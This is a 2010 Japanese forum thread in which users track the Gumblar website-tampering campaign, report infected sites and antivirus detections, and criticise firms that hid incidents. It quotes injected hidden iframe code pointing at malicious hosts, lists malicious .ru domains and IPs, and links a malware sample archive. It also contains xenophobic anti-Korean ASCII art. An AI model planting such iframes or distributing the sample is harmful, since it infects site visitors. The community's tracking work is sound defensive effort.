22 名前: バールのようなもの(不明なsoftbank)[] 投稿日:2010/01/19(火) 18:44:39.14 ID:64+L9xsa
【サンプル動画】
97 名前:名無し募集中。。。[] 投稿日:2010/01/19(火) 16:02:03.04 0
h t t p : / / www.prestige-av.com/ec/index.php?main_page=show_movie&product_model=EVO-118
0150名無しさん@お腹いっぱい。
2010/01/20(水) 09:13:55PDFだけでも20〜30、さらにあったか・・・
0151名無しさん@お腹いっぱい。
2010/01/20(水) 09:16:550152名無しさん@お腹いっぱい。
2010/01/20(水) 09:47:30ちょw
0153名無しさん@お腹いっぱい。
2010/01/20(水) 09:50:18Pandaクラウドになったら検知率上がったみたい
0154名無しさん@お腹いっぱい。
2010/01/20(水) 10:11:270155名無しさん@お腹いっぱい。
2010/01/20(水) 12:07:42報告した中からgoogleでURLを検索して検索数が多かった被害サイト
smartlifestyle.sakura.ne●jp/ 58500
www.iyashisalon-navi●net/ 34200 サイト全体
nakano.main●jp/ 16000
cash-you●com/ 11100
www.f-ture●com/ 9890
monde.client●jp/ 7050 monde.client●jp/monde/02.html とか数ページ
eefy.fem●jp/ 6040
0156名無しさん@お腹いっぱい。
2010/01/20(水) 13:58:14---↓ここから↓---
<iframe umcoq='HwL7BETd' src='http://liveiframe●net/s/in●cgi?7 '
tligu='CJyMDWo4' width='0' height='0' style='display:none'></iframe>
<iframe iccmc='nU2hKVfk' src='http://4analytics●ws/in●cgi?8 '
wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe>
---↑ここまで↑---
今度は「あふぃ」でも始めたのか?
0157名無しさん@お腹いっぱい。
2010/01/20(水) 14:30:51ここやられてる?
0158名無しさん@お腹いっぱい。
2010/01/20(水) 14:47:370159名無しさん@お腹いっぱい。
2010/01/20(水) 14:48:530160名無しさん@お腹いっぱい。
2010/01/20(水) 14:50:50そうですか…最近携帯にも感染するウイルスってのもいるみたいだから…
0161名無しさん@お腹いっぱい。
2010/01/20(水) 15:00:520162名無しさん@お腹いっぱい。
2010/01/20(水) 15:17:07PDF大好きなin.cgiやin.phpはかなり前から見かける。
微妙に別系統(完全に別とは思わんけど)な気がする。
0163名無しさん@お腹いっぱい。
2010/01/20(水) 16:22:24実行ファイルのパスに
C:\WINDOWS\system32\svchost -k rpcss
とあって、スタートアップの種類が自動から変えられない・・。
これは何なんでしょうか?
0164名無しさん@お腹いっぱい。
2010/01/20(水) 16:33:16カスペルスキー使ってない?
だとしたら犯人はカスペルスキーだ。
0166名無しさん@お腹いっぱい。
2010/01/20(水) 16:36:570167名無しさん@お腹いっぱい。
2010/01/20(水) 16:39:21ぐぐるキャッシュに/*LGPL*/
0168名無しさん@お腹いっぱい。
2010/01/20(水) 16:39:280169名無しさん@お腹いっぱい。
2010/01/20(水) 16:47:29カスペルスキーは使ってないです。ソフトはESET Smart
>>165
なるほどw 了解です
設定変えられないから、ウィルスにでも感染してるのかと心配になったよ。
回答サンクス
0170名無しさん@お腹いっぱい。
2010/01/20(水) 16:57:210171名無しさん@お腹いっぱい。
2010/01/20(水) 17:01:580172名無しさん@お腹いっぱい。
2010/01/20(水) 17:11:05美味いのは一年目ぐらいだな
0173名無しさん@お腹いっぱい。
2010/01/20(水) 17:16:10あいつらは責任とって自決するべきだ
あそこまでして業務停止命令が下らないなんて世の中おかしいよ
0174名無しさん@お腹いっぱい。
2010/01/20(水) 17:36:360175名無しさん@お腹いっぱい。
2010/01/20(水) 17:41:04ブックマーク等の変更をお願い致します。
http://gumblarchecker.crz.jp/
GumblarChecker2=http://gumblarchecker.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
0177名無しさん@お腹いっぱい。
2010/01/20(水) 18:35:36多分他にも。
というかMTのテンプレファイルもやられるっぽい。
MTで作ったサイトが全ページあうあうだった。
しかし、小さな会社だと「改ざんされてたアルよ・・・」って告知するとダメージ大きいよなぁ。
そんな理由で告知しないところが多数なんだけど、やっぱ告知すべきなのかね?
0178名無しさん@お腹いっぱい。
2010/01/20(水) 18:37:00あー、お疲れ様です。
あ、書き忘れてたけど、avastがようやく8080スクリプトを検出してくれるようになった。
他のソフトどうよ?
0179名無しさん@お腹いっぱい。
2010/01/20(水) 18:40:590180名無しさん@お腹いっぱい。
2010/01/20(水) 18:41:38広報に凸してみました
笑ってました(何故?
ttp://www.jeita.or.jp/japanese/about/secret/new_location.htm
新JEITA本部事務所〒101-0065
東京都千代田区西神田3-2-1
千代田ファーストビル南館
総合企画部(企画グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(政策グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(調査グループ) TEL:03-5275-7255 / FAX:03-5212-8121
総合企画部(広報室) TEL:03-5275-7254 / FAX:03-5212-8123
総合企画部(安全担当) TEL:03-5275-7256 / FAX:03-5212-8121
知的基盤部 TEL:03-5275-7259 / FAX:03-5212-8122
知的基盤部(補償金管理室) TEL:03-5212-8131 / FAX:03-5212-8132
国際部 TEL:03-5275-7263 / FAX:03-5212-8122
環境部 TEL:03-5275-7257 / FAX:03-5212-8121
コンシューマ・プロダクツ部 TEL:03-5275-7260 / FAX:03-5212-8122
コンシューマ・プロダクツ部
(特定プロジェクト推進室) TEL:03-5275-7260 / FAX:03-5212-8122
インダストリ・システム部 TEL:03-5275-7261 / FAX:03-5212-8122
電子部品部
TEL:03-5275-7262 / FAX:03-5212-8122
電子デバイス部 TEL:03-5275-7258 / FAX:03-5212-8121
総務部(総務グループ) TEL:03-5275-7251 / FAX:03-5212-8121
総務部(経理グループ) TEL:03-5275-7252 / FAX:03-5212-8121
総務部(会員サービスグーループ) TEL:03-5212-8255 / FAX:03-5212-8130
関連組織[移転事務所のみ]
有限責任中間法人 ITセキュリティセンター
Information Technology Security Center
〒101-0065 東京都千代田区西神田3-2-1 千代田ファーストビル南館
TEL:03-5212-8271 / FAX:03-5212-8272
0181名無しさん@お腹いっぱい。
2010/01/20(水) 18:48:44無能管理者のせいで客のPCを被害にあわせてるのに告知しないほうがおかしい
まあ客も馬鹿だけど隠蔽するのは悪質すぎる
0182名無しさん@お腹いっぱい。
2010/01/20(水) 18:51:38http://tsushima.2ch.net/test/read.cgi/news/1263980293/
0183名無しさん@お腹いっぱい。
2010/01/20(水) 18:53:27ttp://puppet.asablo.jp/blog/cat/gumblar/
ガンブラー vs avast! - smilebanana
ttp://www.smilebanana.com/archives/2010/01/19-2021.php
この辺のブログも要チェック。
0184名無しさん@お腹いっぱい。
2010/01/20(水) 20:41:54もうGumblarへの対応に疲れちゃったんですが……
お疲れ様です。一緒に飲みに行きましょう:-)。
www
0185名無しさん@お腹いっぱい。
2010/01/20(水) 20:46:15MTの場合はバージョンが古く、ソフトの脆弱性を突かれて
管理PCは感染していなくても勝手に管理権限のあるIDが増やされたりした事例もあったはず。
サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2112
0186名無しさん@お腹いっぱい。
2010/01/20(水) 20:48:50乙。
デザインが一新されて良い感じ。
右上のガンブラーAAワロスw
0187名無しさん@お腹いっぱい。
2010/01/20(水) 21:14:35>●ガンブラーとカタカタ表記になるのがイヤなんですが……
カタカタカタカタカタカタカタカタ((((;゚Д゚)))カタカタカタカタカタカタカタカタ
0188名無しさん@お腹いっぱい。
2010/01/20(水) 21:18:200189名無しさん@お腹いっぱい。
2010/01/20(水) 21:34:030190名無しさん@お腹いっぱい。
2010/01/20(水) 21:57:15これは個人の問題じゃないからな
0191名無しさん@お腹いっぱい。
2010/01/20(水) 22:21:43ヤホーとかで検索して
検索結果の右端のマークが緑だったら大丈夫なの?
そうならGumblarとか8080にやられていないってことでFA?
0192名無しさん@お腹いっぱい。
2010/01/20(水) 22:23:38指標にはなるが確実とはいえない
0193名無しさん@お腹いっぱい。
2010/01/20(水) 22:24:09全然当てにならないと思え
0194名無しさん@お腹いっぱい。
2010/01/20(水) 22:27:24わかったありがとう
0195名無しさん@お腹いっぱい。
2010/01/20(水) 22:30:31だから今後はjavascriptを使わないサイトが増えるだろう
そもそもjavascriptって耳とかヘソにピアスするような感じだろ
消毒しなかったら膿んでくるしね。 あとあと面倒
いらねーよ(´A`)
0196名無しさん@お腹いっぱい。
2010/01/20(水) 22:32:230197名無しさん@お腹いっぱい。
2010/01/20(水) 22:34:28サイト名の左に緑(安全)赤(危険)グレー(未チェック)のマークがあったのに、
こないだIE6からIE8にしたら、何も出なくなっちゃって、
サイト行くのが不安だ…。
けっこうあのマーク頼りにしてたのに、IE8はマークなしデフォなの?
教えてえろいひと
0198名無しさん@お腹いっぱい。
2010/01/20(水) 22:36:420199名無しさん@お腹いっぱい。
2010/01/20(水) 22:39:16みなさん失礼しました
0200名無しさん@お腹いっぱい。
2010/01/20(水) 22:50:42もう2chで貼られている画像リンクに興味を抱く事もないだろう
0201名無しさん@お腹いっぱい。
2010/01/20(水) 22:51:31もう2chで貼られている画像リンクに興味を抱く事もないだろう
0202名無しさん@お腹いっぱい。
2010/01/20(水) 22:53:40もう2chで貼られている画像リンクに興味を抱く事もないだろう
0203名無しさん@お腹いっぱい。
2010/01/20(水) 22:53:57じゃなくて、P2鯖の暴発ねw
0204名無しさん@お腹いっぱい。
2010/01/20(水) 23:01:070205名無しさん@お腹いっぱい。
2010/01/20(水) 23:02:480206名無しさん@お腹いっぱい。
2010/01/20(水) 23:07:25―――――――――――――‐┬┘
|
____.____ | .__ いらない韓国を
| | | | |\_\ 窓から投げ捨てろ
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
0207名無しさん@お腹いっぱい。
2010/01/20(水) 23:08:310208名無しさん@お腹いっぱい。
2010/01/20(水) 23:13:410209名無しさん@お腹いっぱい。
2010/01/20(水) 23:14:520210名無しさん@お腹いっぱい。
2010/01/20(水) 23:16:440211名無しさん@お腹いっぱい。
2010/01/20(水) 23:29:38ttp://www.trendflexsecurity.jp/housecall/index.php?Homeclick=threat_onlinescan
パッケージ販売やメーカー修理を目論んでいるらしい
0212名無しさん@お腹いっぱい。
2010/01/20(水) 23:43:550213名無しさん@お腹いっぱい。
2010/01/21(木) 00:31:400214213
2010/01/21(木) 00:32:22ごめんなさい
0215名無しさん@お腹いっぱい。
2010/01/21(木) 01:46:18>>166
のリンク先って何があったの?なぜ騒がれているの?
0216名無しさん@お腹いっぱい。
2010/01/21(木) 01:50:370217名無しさん@お腹いっぱい。
2010/01/21(木) 10:57:22―――――――――――――‐┬┘
|
____.____ | .__ いらない韓国を
| | | | |\_\ 窓から投げ捨てろ
| | ∧_∧ | | | |.韓.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.国.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
0218名無しさん@お腹いっぱい。
2010/01/21(木) 13:00:240219名無しさん@お腹いっぱい。
2010/01/21(木) 15:12:31Doe最高
0220名無しさん@お腹いっぱい。
2010/01/21(木) 16:52:21main.html
main.php
default-filters.php
0221名無しさん@お腹いっぱい。
2010/01/21(木) 17:27:06有名どころではギコナビやlive2chはIE仕様
特にlive2chには根強いファンが結構いる
ギコナビはとにかくシンプル且つ初心者向け設計、live2chはjaneには拡張面で負けるが使い易さを追求したタイプ
0222名無しさん@お腹いっぱい。
2010/01/21(木) 19:12:380223名無しさん@お腹いっぱい。
2010/01/21(木) 19:42:470224名無しさん@お腹いっぱい。
2010/01/21(木) 20:14:200225名無しさん@お腹いっぱい。
2010/01/21(木) 20:16:01感染したのか?
0226名無しさん@お腹いっぱい。
2010/01/21(木) 20:44:03ttp://www.yomiuri.co.jp/national/news/20100121-OYT1T01075.htm
0227名無しさん@お腹いっぱい。
2010/01/21(木) 20:54:43公表せずに逃げきろうとしたのか
糞だな
0228名無しさん@お腹いっぱい。
2010/01/21(木) 20:57:370229名無しさん@お腹いっぱい。
2010/01/21(木) 20:59:500230名無しさん@お腹いっぱい。
2010/01/21(木) 21:01:30なんとか大元特定できないのかね?
0231名無しさん@お腹いっぱい。
2010/01/21(木) 21:04:50考え方が甘いって言うか
0232名無しさん@お腹いっぱい。
2010/01/21(木) 21:11:000233名無しさん@お腹いっぱい。
2010/01/21(木) 21:15:310234名無しさん@お腹いっぱい。
2010/01/21(木) 21:15:550235名無しさん@お腹いっぱい。
2010/01/21(木) 21:56:36バスターでJS_ONLOAD.SMFがでて、avastでJS:Illredir-Cが出た
0236名無しさん@お腹いっぱい。
2010/01/21(木) 22:18:27ゲーム?
やっべ俺逝ったことある?
0237名無しさん@お腹いっぱい。
2010/01/21(木) 22:20:57McAfee
JS/Redirector.e
0238名無しさん@お腹いっぱい。
2010/01/21(木) 22:57:13/*LGPL*/さんが居座ってるな
0239名無しさん@お腹いっぱい。
2010/01/21(木) 23:12:180240名無しさん@お腹いっぱい。
2010/01/21(木) 23:24:590241名無しさん@お腹いっぱい。
2010/01/21(木) 23:29:04> なんとか大元特定できないのかね?
ホリプロじゃね?
Domain Information: [ドメイン情報]
[Domain Name] TGG-TS.JP
[登録者名] 株式会社 ホリプロ
[Registrant] horipro
[Name Server] ns1.secure.net
[Name Server] ns2.secure.net
[登録年月日] 2009/02/05
[有効期限] 2010/02/28
[状態] Active
[最終更新] 2010/01/04 14:19:31 (JST)
0242名無しさん@お腹いっぱい。
2010/01/21(木) 23:32:320243名無しさん@お腹いっぱい。
2010/01/21(木) 23:34:53めるすたお。
0244名無しさん@お腹いっぱい。
2010/01/21(木) 23:35:02/*handle exception*/
hxxp://tkfd-shumatsu-gakko●jp/cat15/
avast!, Avira 送付済み
0245名無しさん@お腹いっぱい。
2010/01/21(木) 23:38:44k-click●net
だにゃ
0246名無しさん@お腹いっぱい。
2010/01/21(木) 23:40:07アッー!
0247名無しさん@お腹いっぱい。
2010/01/21(木) 23:41:35これってアンチウイルスは対応できないのとちゃう?
0248名無しさん@お腹いっぱい。
2010/01/21(木) 23:46:15当然、チェッカーにひっかからない
対応出来ないだろこれ
.ru:8080のアドレス集めるしかないのか
0249名無しさん@お腹いっぱい。
2010/01/21(木) 23:49:060250名無しさん@お腹いっぱい。
2010/01/21(木) 23:50:33こわいいい!
0251名無しさん@お腹いっぱい。
2010/01/21(木) 23:52:05なんで?
素人でごめんなさい。
0252名無しさん@お腹いっぱい。
2010/01/21(木) 23:54:54普通のスクリプトになったから。。。
アドレスで反応するようになるかも。。。
0253名無しさん@お腹いっぱい。
2010/01/21(木) 23:55:07のgenius.jpn●org/も別のスクリプトになってないか?
0254名無しさん@お腹いっぱい。
2010/01/21(木) 23:57:14Aguseでカスペ反応でた
Trojan.JS.Iframe.hw
0255名無しさん@お腹いっぱい。
2010/01/21(木) 23:58:53ありがと。
0256名無しさん@お腹いっぱい。
2010/01/22(金) 00:09:21avast!, Avira に提出した
0257名無しさん@お腹いっぱい。
2010/01/22(金) 00:20:53whoisからのとでじろくにめる
0258名無しさん@お腹いっぱい。
2010/01/22(金) 00:24:49カスペだと↓こんなん出ました
2010/01/22 0:16:23 検出しました: Trojan.JS.Iframe.hw http://blogger-com●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com●cn/nhl●com/google●com/
0259名無しさん@お腹いっぱい。
2010/01/22(金) 00:25:200260名無しさん@お腹いっぱい。
2010/01/22(金) 00:25:58avast!反応した
0261名無しさん@お腹いっぱい。
2010/01/22(金) 00:26:48これって飛ばされた先に反応してるんであってスクリプトには反応してないってことだよな
0262名無しさん@お腹いっぱい。
2010/01/22(金) 00:29:50You are right !
だから、JSを切った状態では反応しなかったよwww
0263名無しさん@お腹いっぱい。
2010/01/22(金) 00:33:01投げてみた。
ttp://www.virustotal.com/analisis/3fc4054854f25859ed10718f546512f36ba3b37530c00d2c9531f145000b555d-1264087637
Result: 0/40 (0%)
0264名無しさん@お腹いっぱい。
2010/01/22(金) 00:37:040265名無しさん@お腹いっぱい。
2010/01/22(金) 00:41:36埋め込まれたページ全滅
ttp://www.virustotal.com/jp/analisis/0d694d4ae4bdcb4a834f848fa0e88715c3a97f833dcf38027e8d6357de5bddd8-1264087766
次の blogger-com●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com=彡n/nhl●com/google●com/ は、
わりと検出しる
ttp://www.virustotal.com/jp/analisis/e92725bb2d627430609ce25ac2529a53ace77d7cea4d730e5cf75731e764019c-1264087456
その次の本編はカスペだけ
ttp://www.virustotal.com/jp/analisis/f56402351b202aeaae06bc141231fb1cfbcb4062ae10beece0a8a93b3fb073e9-1264087622
本編のPDFをとりに行ったら、とりそこなってアク禁状態...orz
0266名無しさん@お腹いっぱい。
2010/01/22(金) 00:41:36aguseは飛び先も見てるかも
0267名無しさん@お腹いっぱい。
2010/01/22(金) 00:44:19こちらの環境では取れないけど
:8080/pics/win.jpg は取れない?
0268名無しさん@お腹いっぱい。
2010/01/22(金) 00:52:57DNSが引けなくなっちゃった
0269名無しさん@お腹いっぱい。
2010/01/22(金) 00:56:21ドクペwebのリンクスキャナーも2回に1回しか捕まえられない><
0270名無しさん@お腹いっぱい。
2010/01/22(金) 00:58:15ttp://megalodon.jp/2010-0122-0050-27/online.drweb.com/result?url=http%3A%2F%2Fobtex%2Dcom%2Eocn%2Ene%2Ejp%2Egamezer%2Dcom%2Eauthentictype%2Eru%3A8080%2Fpics%2Fwin%2Ejpg
> In file win.jpg found virus Exploit.DirectShow
0271名無しさん@お腹いっぱい。
2010/01/22(金) 01:02:41全滅っぽいんだけど、うちだけ?
0272名無しさん@お腹いっぱい。
2010/01/22(金) 01:04:51DNS は引けるけど 8080 に connect できない
0273名無しさん@お腹いっぱい。
2010/01/22(金) 01:05:46authentictype.ru:8080は同じだけど、アドレス違うからか。。。
0274名無しさん@お腹いっぱい。
2010/01/22(金) 01:15:11authentictype.ru
オランダ
0275名無しさん@お腹いっぱい。
2010/01/22(金) 01:17:20どっちもサイト改ざんされるの?
あと、最近ニュースで Gumblar と言われてるのは
このスレでいう
8080(GPL GNU CODE1) のこと?
対応しました
こう・・特徴が無くなると判断しづらくなるんだよなあ
JavaScriptパーサ作る必要もありそうだ
http://gumblarchecker.crz.jp
0277名無しさん@お腹いっぱい。
2010/01/22(金) 01:23:50とりあえずめるした。
ろりぽにもつーほー
0278名無しさん@お腹いっぱい。
2010/01/22(金) 01:23:55乙
0279名無しさん@お腹いっぱい。
2010/01/22(金) 01:26:010280名無しさん@お腹いっぱい。
2010/01/22(金) 01:26:02でウイルスバスターが反応した。
0281名無しさん@お腹いっぱい。
2010/01/22(金) 01:26:500282名無しさん@お腹いっぱい。
2010/01/22(金) 01:27:26泣いた
0283名無しさん@お腹いっぱい。
2010/01/22(金) 01:28:27カスペ対応しました
2010/01/22 1:22:41 検出しました: Trojan.JS.Agent.bbu http://tkfd-shumatsu-gakko.jp/cat15/
0284名無しさん@お腹いっぱい。
2010/01/22(金) 01:29:08nikkansports●comとか含まれてるし
ターゲットは日本か
0285名無しさん@お腹いっぱい。
2010/01/22(金) 01:29:12補足よろろ
ampsguide.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
suesite.ru
superaguide.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
0286名無しさん@お腹いっぱい。
2010/01/22(金) 01:32:040287280
2010/01/22(金) 01:36:42WinXPSP3+Winupdate済 IE6
AdobeReader7.10
flashはWindowsのもの
gwなし
プロキシ有
プロキシのログにはなにものこってなかった。
バスターCorpでスキャンしても何も出なかった。
0288名無しさん@お腹いっぱい。
2010/01/22(金) 01:43:46こちらの環境だと落ちてこない。。。
0289280
2010/01/22(金) 01:44:59何か、ドジったかな。
とりあえず、試したPCは再インストール中でタイムアップとなった。
0290名無しさん@お腹いっぱい。
2010/01/22(金) 01:59:33新型ウイルス「ガンブラー」対策に有効なプラグインチェックツールを提供、
Firefox 3.6 の入手方法
Windows、Mac、および Linux 版が 70 か国語以上で同時リリースされる Firefox は、他のどのブラウザよりも多くのプラットフォームと言語に対応しています。
Firefox 3.6 は GetFirefox.com から無料でダウンロードできます。なお、Firefox 3.6 は 1 月 22 日 午前 2 時頃よりダウンロード可能となります。
http://mozilla.jp/press/releases/2010/01/21/
0291名無しさん@お腹いっぱい。
2010/01/22(金) 02:03:16中身はRC2版と同じなんだってね
0292名無しさん@お腹いっぱい。
2010/01/22(金) 02:08:39追加しますた
8080 系ブラックサイト
---------------
ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
(次に続く)
0293名無しさん@お腹いっぱい。
2010/01/22(金) 02:08:43全部IPが引けなくなってしまった
>>285
これも全部アドレスが引けない
>>286
これも引けなかった
>>274
これだけアドレス引けたけど、どしたらいい?
217.23.5.27
91.121.4.99
91.121.167.41
94.23.11.38
94.23.206.229
0294名無しさん@お腹いっぱい。
2010/01/22(金) 02:09:080295292
2010/01/22(金) 02:09:20theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
sqliteをアイドル時に自動で最適化するようになったから結構違うはず
0297名無しさん@お腹いっぱい。
2010/01/22(金) 02:11:24アドレスはコロコロ変わるよ
0298名無しさん@お腹いっぱい。
2010/01/22(金) 02:17:35CCleanerで小まめに最適化してる俺に隙はなかった
0299名無しさん@お腹いっぱい。
2010/01/22(金) 02:22:51とりあえずwhoisからめるすた。
0300名無しさん@お腹いっぱい。
2010/01/22(金) 02:23:31SQLite Optimizerお役ご免か
まあいいけど
0301名無しさん@お腹いっぱい。
2010/01/22(金) 02:35:55ここで見え見えの平文に切り替えてくるとか、何という逆転の発想w
敵もさる者よのう
0302名無しさん@お腹いっぱい。
2010/01/22(金) 02:39:290303名無しさん@お腹いっぱい。
2010/01/22(金) 02:40:250304名無しさん@お腹いっぱい。
2010/01/22(金) 02:41:56もうru:8080はお役ご免, これからは今まで改ざんされた鯖が裏proxyになる。
これで正規のリダイレクトか不正のそれか区別出来なくなった
0305名無しさん@お腹いっぱい。
2010/01/22(金) 02:52:36お前が馬鹿なのがよく分かる書き込みだな
0306名無しさん@お腹いっぱい。
2010/01/22(金) 03:09:01どのサイトも安心してのぞける
0307名無しさん@お腹いっぱい。
2010/01/22(金) 03:11:44>>23,>>253
さくらにつーほーしますた。
0308名無しさん@お腹いっぱい。
2010/01/22(金) 04:41:10難読化されてる。。。
0309名無しさん@お腹いっぱい。
2010/01/22(金) 04:42:580310名無しさん@お腹いっぱい。
2010/01/22(金) 04:46:430311名無しさん@お腹いっぱい。
2010/01/22(金) 05:37:36http://www.virustotal.com/jp/analisis/abaa823646f4eaf3458136291cff3f3c2324b4b981636474611b8baa1d5b87e7-1264105614
0312名無しさん@お腹いっぱい。
2010/01/22(金) 05:46:330313名無しさん@お腹いっぱい。
2010/01/22(金) 05:48:26ウィンドウズ関連ファイル直リン倶楽部 其の20
http://pc12.2ch.net/test/read.cgi/win/1253284232/804-808
0314名無しさん@お腹いっぱい。
2010/01/22(金) 05:58:02http://labs-uploader.sabaitiba.com/virus/download/1264107313.7z
infected
0315名無しさん@お腹いっぱい。
2010/01/22(金) 09:01:32保護モードに対応するまでIE使い続ける
0316名無しさん@お腹いっぱい。
2010/01/22(金) 10:24:30ふぅ・・・
0317名無しさん@お腹いっぱい。
2010/01/22(金) 10:51:44hxxp://tkfd-shumatsu-gakko●jp/cat15/
コードだけ撤去して「告知せず」かよ
Googleのキャッシュ(アクセス注意)
tp://74.125.153.132/search?q=cache:AktNBszrpnwJ:tkfd-shumatsu-gakko.jp/cat15/+tkfd-shumatsu-gakko.jp/cat15&cd=1&hl=ja&ct=clnk&gl=jp
>このページは 2010年1月10日 16:55:12 GMT に取得されたものです。
ソースに/*LGPL*/が刻印されてるしw
0318名無しさん@お腹いっぱい。
2010/01/22(金) 11:07:09よく腐敗した組織だことw
0319名無しさん@お腹いっぱい。
2010/01/22(金) 11:10:04逆にその流れに紛れてきっちり謝罪したほうが
好感度↑なのにねぇ。あほすぐる
0320名無しさん@お腹いっぱい。
2010/01/22(金) 11:14:54当財団ウェブサイトに関するお詫び
TOP 公募・お知らせ 当財団ウェブサイトに関するお詫び
更新日:2010/01/07
東京財団の日本語ウェブサイトにおいて、第3者による改ざんが確認され、
ウィルス感染の可能性があるページを一定時間公開していたことが判明いたしました。
ここにお知らせいたしますとともに、対象時間に当ホームページを閲覧された皆様に
ご迷惑をおかけしましたことをお詫び申しあげます。
サイト全体を確認した結果、1月6日11時54分現在、修正を完了しております。
■対象サイト
東京財団日本語ホームページ(http://www.tkfd.or.jp/内のページ)
■対象時間
2010年1月5日19時30分ごろ〜1月6日正午ごろ
■内 容
第三者による改ざんにより、当財団ホームページの一部に不正な記述がなされ、
ウイルス感染の可能性があります。感染したパソコンでは、意図しないサイトへ
誘導されてしまう可能性があります。
0321名無しさん@お腹いっぱい。
2010/01/22(金) 11:21:100322名無しさん@お腹いっぱい。
2010/01/22(金) 11:25:36ガンブラー再燃を契機にセキュリティの基本を見直そう - インタビュー:ITpro
ttp://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security
> 各社の正規サイト改ざんに使われた手口は調査中の段階ですが、盗まれたFTPサー
> バーのログイン情報が使われた可能性は低いと考えています。
> ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃
> する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLイン
> ジェクションによるものだと推測しています。
0323名無しさん@お腹いっぱい。
2010/01/22(金) 11:25:40http://www.yomiuri.co.jp/net/security/s-news/20100122-OYT8T00417.htm
東京都は21日、東京芸術劇場(豊島区)の演目を案内する専用サイト
「東京芸術劇場チケットサービス」が改ざんされ、新型コンピューターウイルス「ガンブラー」に感染していたと発表した。
現時点で個人情報流出などの被害報告はないという。サイト運営業者は今月9日に感染に気付いていたが公表せず
サイトが閉鎖されたのは19日になってからだった。先月17日以降に閲覧した人は感染の恐れがあるといい
この間のアクセス件数は2万3181件。
発表によると、同劇場では今月19日、サイト利用者から「ウイルスに感染しているのではないか」との連絡を受け、サイトを閉鎖。
しかし、サイト運営を委託されている芸能事務所・ホリプロ(東京・目黒区)はこれより前の今月9日に、別の利用者からの指摘で感染に気付いていたが
公表していなかったという。
同社は「担当者が重大性を認識しておらず、改ざん場所を復旧させただけで、公表しなかった。深く反省している」としている。
0324名無しさん@お腹いっぱい。
2010/01/22(金) 11:33:13固定コンテンツしか使ってないサイトもたくさんやられてるじゃん
だから普通にftpアカウント盗まれてるでしょ?
0325名無しさん@お腹いっぱい。
2010/01/22(金) 11:44:05で、今はホリプロのトップにお詫びの告知があるのか?
とてもとても見に行く気にはなれないけど
0326名無しさん@お腹いっぱい。
2010/01/22(金) 11:53:41トレンドマイクロ サポートサービス本部 セキュリティエンハンスメントサポートグループ Threat Monitoring Center 課長の飯田朝洋氏
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
トレンドマイクロ終了のお知らせでした
0327名無しさん@お腹いっぱい。
2010/01/22(金) 11:58:48その記事のコメント欄に差分チェック&メール通知ASPのリンクが貼られてるね。
リンク先見てないけど宣伝?
ttp://websitesafe●net/
0328名無しさん@お腹いっぱい。
2010/01/22(金) 12:03:48> コードだけ撤去して「告知せず」かよ
そんなのいいほうだよ
ttp://www.ikumo-web.org/news/nanoimpact-trojan/
> 2010年1月2日(土)現在、ナノインパクトのHPにアクセスすると、ウイルス対策
> ソフトがトロイの木馬を検知します。以下参考ページの内容と同様の事象と推測
> しています。
↓
> 2010年1月6日(水)、HPの管理者より問題が解決したの連絡を受けました。当サ
> イト管理者が確認したところ、連絡を受けた通り解決してました。
>
> 原因は不正改ざんではなく、過去に作成したファイルがサーバに残っており、そ
> れが原因とのことです。また、ウイルス感染もないとのことです。
ナノインパクトのHPとやら
ttp://www●nanoimpact●jp/
> 10.01.06 1月2日に一部のHPにてナノインパクトHPが不正改ざん、ウイルス感染の
> 可能性という 掲示が出ておりました。弊社で調査したところ原因は不正改ざんや
> ウイルス感染ではなく、過去に作成したファイルがサーバに残っていたために一部
> のウイルスセキュリティソフトにてウイルスと認識されておりました。該当ファイ
> ルを削除し、問題のないことを確認致しましたことをご報告致します。
ほほ〜ぅ>>監視モードスタート>>
2010/01/08 9:51 改ざん(/*LGPL*/埋め込み)
2010/01/12 22:42 修復
未だ告知なし
俺の中ではこいつらが最凶
0329名無しさん@お腹いっぱい。
2010/01/22(金) 12:14:500330名無しさん@お腹いっぱい。
2010/01/22(金) 12:16:180331名無しさん@お腹いっぱい。
2010/01/22(金) 12:25:430332名無しさん@お腹いっぱい。
2010/01/22(金) 12:33:510333名無しさん@お腹いっぱい。
2010/01/22(金) 12:34:13ことあるごとに、こっそり(のつもりで)修復して知らん振りの企業名を挙げてやればいい
0334名無しさん@お腹いっぱい。
2010/01/22(金) 12:43:400335名無しさん@お腹いっぱい。
